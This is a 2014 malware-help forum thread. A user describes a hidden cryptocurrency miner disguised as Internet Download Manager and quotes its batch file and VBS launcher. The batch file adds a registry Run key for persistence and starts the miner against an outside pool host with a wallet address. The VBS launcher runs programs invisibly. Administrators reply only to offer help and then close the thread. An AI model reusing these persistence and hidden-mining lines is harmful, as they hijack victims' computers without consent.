KahunaPapa Posted August 6, 2014 ID:863295 Share Posted August 6, 2014 Hello All, My system was really slow one morning. Task manager showed that Internet Download Manager was running even though I never install it. I found it's location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU. A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system. The bat file that started it was:@echo off%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /fstart /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x The vbs script file in the same folder as the bat file was:CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system. I know this is a trojan of some kind. But could someone please interpret the bat and script files for me and what information these are sending to ns1.eaglecould.su. Thank you Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted August 22, 2014 Root Admin ID:869793 Share Posted August 22, 2014 Very sorry for the delay. The site has been very busy and there has been more demand for support than we were able handle for a while there.I'm just now getting back to see if you still need help or not. If you do please reply back and let me know and I'll go ahead and assist you.Thank you Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted September 23, 2014 Root Admin ID:882149 Share Posted September 23, 2014 Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Thanks! Link to post Share on other sites More sharing options...
Recommended Posts